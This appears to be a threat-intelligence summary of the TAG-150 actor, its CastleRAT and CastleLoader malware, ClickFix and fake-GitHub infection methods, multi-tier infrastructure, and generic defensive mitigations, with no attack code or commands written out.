Full Report
Insikt Group reveals TAG-150’s multi-tiered infrastructure and CastleRAT malware—an advanced threat actor evolving rapidly with stealth and scale.
Analysis Summary
# Threat Actor: TAG-150
## Attribution & Identity
**Identification:** TAG-150 (designation by Insikt Group).
**Aliases and Associations:** Associated with the development and use of malware families: CastleLoader, CastleBot, and CastleRAT. Potentially operates on a Malware-as-a-Service (MaaS) model, evidenced by the delivery of varied payloads and observable admin panels, though direct advertising has not been confirmed.
## Activity Summary
TAG-150 has been active since at least March 2025, demonstrating rapid development, technical sophistication, and responsiveness to public reporting. They utilize a large, multi-tiered infrastructure (Tier 1 through Tier 4) for operations. Recent activities include the deployment of newly developed malware, most notably CastleRAT (a new Remote Access Trojan). Infections are primarily initiated via Cloudflare-themed "ClickFix" phishing attacks or fraudulent GitHub repositories impersonating legitimate applications (e.g., software libraries, browser updates). These attacks rely on tricking victims into executing malicious PowerShell commands. The actor leverages various third-party services, including file-sharing platforms, messaging platforms, and anti-detection services like Kleenscan.
## Tactics, Techniques & Procedures
- **Initial Access:** Cloudflare-themed "ClickFix" phishing attacks; compromised GitHub repositories; tricking users into executing malicious PowerShell commands.
- **Defense Evasion/Execution:** Leveraging anti-detection services (e.g., Kleenscan).
- **Command & Control (C2):** Use of multi-tiered infrastructure (Tier 1 victim-facing C2s, higher-tier infrastructure).
- **Payload Delivery:** Use of initial infection vectors (CastleLoader, CastleBot) to drop secondary payloads like SectopRAT, WarmCookie, HijackLoader, NetSupport RAT, and various information stealers.
- **Capabilities (CastleRAT):** Collecting system information, downloading/executing secondary payloads, executing commands via CMD and PowerShell.
- **MITRE ATT&CK IDs:** TA0011 (Command-And-Control) mentioned in alert metadata.
## Targeting
- **Sectors:** Not explicitly detailed, but methods (software libraries, development tools) suggest targeting software developers, and general organizations susceptible to phishing/supply chain compromise.
- **Geography:** Not specified in the summary.
- **Victims:** Not named specifically, but infection rates among interacting victims were noted as high (28.7%).
## Tools & Infrastructure
- **Malware families used:** CastleLoader, CastleBot, CastleRAT (Python and C variants), SectopRAT, WarmCookie, HijackLoader, NetSupport RAT, Stealc, RedLine Stealer, Rhadamanthys Stealer, DeerStealer, MonsterV2 (as secondary payloads).
- **Infrastructure:** Extensive, multi-tiered infrastructure (Tier 1 through Tier 4). Leverages specialized utilities/services like Kleenscan $\text{kleenscan[.]com}$.
- **Infrastructure (C2, domains, IPs):** IOCs are blocked, but specific addresses are not detailed in the text provided, only mentioned in mitigation advice.
## Implications
TAG-150 represents a rapidly evolving and technically capable threat actor. Their adoption of a new, self-developed RAT (CastleRAT) and reliance on sophisticated social engineering (ClickFix) indicates a mature operation. Their multi-tiered infrastructure suggests resilience against takedowns. The high observed infection rate (28.7%) underscores the effectiveness of their initial access vectors.
## Mitigations
- Block IP addresses and domains associated with associated loaders, infostealers, and RATs.
- Flag and potentially block connections to unusual LIS (e.g., Pastebin).
- Deploy updated detection rules (YARA, Snort) for current and historical infections.
- Implement email filtering.
- Implement data exfiltration monitoring.
- Continuously monitor the cybercriminal ecosystem for emerging threats.